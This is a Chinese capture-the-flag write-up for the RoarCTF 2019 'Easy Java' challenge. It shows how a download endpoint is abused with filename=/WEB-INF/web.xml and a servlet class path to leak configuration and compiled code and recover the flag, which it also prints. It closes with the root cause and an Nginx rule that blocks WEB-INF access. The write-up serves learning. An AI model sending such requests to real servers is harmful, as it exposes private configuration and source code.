BUUCTF靶场34 -- [RoarCTF 2019]Easy Java

mind

BUUCTF靶场34 -- [RoarCTF 2019]Easy Java

考察点：WEB-INF/web.xml泄露

首先查看源代码和消息头，发现一个线索

[PHP] 纯文本查看 复制代码

<center><p><a href="Download?filename=help.docx" target="_blank">help</a></p></center>

Download?filename={help.docx}

猜测这可能有文件下载漏洞，我尝试替换为index.php和flag.php均没有啥发现。

于是我尝试用POST方式来进行请求，结果却意外发现可以下载文件。下载了一个help.docx的文件，内容如下：

Are you sure the flag is here? ? ?

虽然没啥用，但是找到一条下载通道，试着下载其他服务器信息，如存有web信息的XML文件。

filename=/WEB-INF/web.xml

[XML] 纯文本查看 复制代码

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee [url=http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd]http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd[/url]"
         version="4.0">

    <welcome-file-list>
        <welcome-file>Index</welcome-file>
    </welcome-file-list>

    <servlet>
        <servlet-name>IndexController</servlet-name>
        <servlet-class>com.wm.ctf.IndexController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>IndexController</servlet-name>
        <url-pattern>/Index</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>LoginController</servlet-name>
        <servlet-class>com.wm.ctf.LoginController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>LoginController</servlet-name>
        <url-pattern>/Login</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>DownloadController</servlet-name>
        <servlet-class>com.wm.ctf.DownloadController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>DownloadController</servlet-name>
        <url-pattern>/Download</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>FlagController</servlet-name>
        <servlet-class>com.wm.ctf.FlagController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>FlagController</servlet-name>
        <url-pattern>/Flag</url-pattern>
    </servlet-mapping>

</web-app>

到这一步其实可以很明显得到答案了。

然后扩充一下知识点来自博文：https://www.cnblogs.com/Cl0ud/p/12177085.html

[Plain Text] 纯文本查看 复制代码

 WEB-INF主要包含一下文件或目录： 
/WEB-INF/web.xml：Web应用程序配置文件，描述了 servlet 和其他的应用组件配置及命名规则。 
/WEB-INF/classes/：含了站点所有用的 class 文件，包括 servlet class 和非servlet class，他们不能包含在 .jar文件中 
/WEB-INF/lib/：存放web应用需要的各种JAR文件，放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件 
/WEB-INF/src/：源码目录，按照包名结构放置各个java文件。 
/WEB-INF/database.properties：数据库配置文件

科普：servlet：Servlet（Server Applet）是Java Servlet的简称，称为小服务程序或服务连接器，用Java编写的服务器端程序，具有独立于平台和协议的特性，主要功能在于交互式地浏览和生成数据，生成动态Web内容。（来源百度百科）

其实说明了这个就是JAVA源代码进行编译后所产生的后缀带有.class的东西。于是我们可以下载这个.class文件再利用反编译手段来获得flag。

最终payload:

filename=/WEB-INF/classes/com/wm/ctf/FlagController.class

[Java] 纯文本查看 复制代码

import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

@WebServlet(name = "FlagController")
public class FlagController extends HttpServlet {
  String flag = "ZmxhZ3tjNTIwMThiZi1lMDg3LTQ5YmItYWRiYS04NjBlOTY2YzhlZmN9Cg==";
  
  protected void doGet(HttpServletRequest paramHttpServletRequest, HttpServletResponse paramHttpServletResponse) throws ServletException, IOException {
    PrintWriter printWriter = paramHttpServletResponse.getWriter();
    printWriter.print("<h1>Flag is nearby ~ Come on! ! !</h1>");
  }
}

解密后：flag{c52018bf-e087-49bb-adba-860e966c8efc}






漏洞成因：通常一些web应用会使用多个web服务器搭配使用，解决其中的一个web服务器的性能缺陷以及做均衡负载的优点和完成一些分层结构的安全策略等。在使用这种架构的时候，由于对静态资源的目录或文件的映射配置不当，可能会引发一些的安全问题，导致web.xml等文件能够被读取。漏洞检测以及利用方法：通过找到web.xml文件，推断class文件的路径，最后直接class文件，在通过反编译class文件，得到网站源码。一般情况，jsp引擎默认都是禁止访问WEB-INF目录的，Nginx 配合Tomcat做均衡负载或集群等情况时，问题原因其实很简单，Nginx不会去考虑配置其他类型引擎（Nginx不是jsp引擎）导致的安全问题而引入到自身的安全规范中来（这样耦合性太高了），修改Nginx配置文件禁止访问WEB-INF目录就好了： location ~ ^/WEB-INF/* { deny all; } 或者return 404; 或者其他！